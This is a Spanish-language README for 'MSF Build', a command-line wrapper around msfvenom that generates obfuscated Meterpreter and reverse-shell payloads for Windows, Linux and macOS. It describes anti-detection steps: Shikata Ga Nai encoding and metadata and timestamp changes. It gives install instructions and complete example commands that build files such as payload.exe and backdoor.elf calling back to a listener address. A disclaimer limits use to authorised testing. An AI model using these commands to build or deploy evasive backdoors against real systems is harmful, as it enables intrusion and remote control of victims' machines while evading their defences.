Herramienta profesional para generar payloads ofuscados con Msfvenom utilizando el codificador Shikata Ga Nai
MSF Build es una herramienta CLI para generar payloads ofuscados multiplataforma con medidas anti-detección integradas. Utiliza msfvenom
para crear los payloads y está diseñado para pruebas de penetración éticas.
- ✅ Soporte para Windows, Linux y macOS
- 🔄 Ofuscación con Shikata Ga Nai y múltiples interaciones.
- 🛡️ Medidas básicas anti-detección (modificación de metadatos)
- 🎨 Interfaz colorida con animaciones
- 🧩 Generación de payloads en múltiples formatos:
exe
,elf
,macho
,python
- Python 3.6+
- Metasploit Framework (
msfvenom
) - Terminal con soporte ANSI
# Instalar dependencias
pip install colorama
sudo apt install metasploit-framework # Para sistemas Debian/Ubuntu
# Clonar repositorio
git clone https://github.com/afsh4ck/MSF-Build.git
cd MSF-Build
Menú de Ayuda:
python3 msfbuild.py -h
__ ___ _____ ______ ____ _ __ __
/ |/ // ___/ / ____/ / __ ) __ __ (_)/ /____/ /
/ /|_/ / \__ \ / /_ / __ |/ / / // // // __ /
/ / / / ___/ // __/ / /_/ // /_/ // // // /_/ /
/_/ /_/ /____//_/ /_____/ \__,_//_//_/ \__,_/
-------------------------------------------------------
Msfvenom Advanced Obfuscated Payload Builder
-------------------------------------------------------
Developed by: @afsh4ck
usage: python3 msfbuild.py --os <OS> --arch <ARCH> --type <TYPE> --lhost <IP> --lport <PORT> -o <OUTPUT> [-i ITERATIONS]
options:
--os {windows,linux,macos} Sistema operativo objetivo
--arch {x86,x64} Arquitectura objetivo
--type {exe,elf,macho,python} Tipo de archivo de salida
--lhost LHOST Dirección IP para conexión reversa
--lport LPORT Puerto para conexión reversa
-o OUTPUT, --output OUTPUT Nombre del archivo de salida
-i ITERATIONS, --iterations ITERATIONS Iteraciones de ofuscación (solo x86)
-h, --help Mostrar este mensaje de ayuda
- Por defecto usa el payload: windows/meterpreter/reverse_tcp
python3 msfbuild.py \
--os windows \
--arch x86 \
--type exe \
--lhost 192.168.1.100 \
--lport 4444 \
-o payload.exe \
-i 10
- Por defecto usa el payload: linux/x64/meterpreter/reverse_tcp
python3 msfbuild.py \
--os linux \
--arch x64 \
--type elf \
--lhost 10.0.0.5 \
--lport 8080 \
-o backdoor.elf
- Por defecto usa el payload: osx/x64/shell_reverse_tcp
python3 msfbuild.py \
--os macos \
--arch x64 \
--type macho \
--lhost 172.16.23.45 \
--lport 6500 \
-o mac_payload
- Modificación de timestamps en archivos .exe
- Advertencias automáticas para configuraciones incompatibles
- Validación estricta de parámetros de entrada
Este software está diseñado exclusivamente para:
- Pruebas de seguridad autorizadas
- Investigación en entornos controlados
- Educación en ciberseguridad
El uso malicioso de esta herramienta es estrictamente prohibido. El autor no se hace responsable del uso indebido.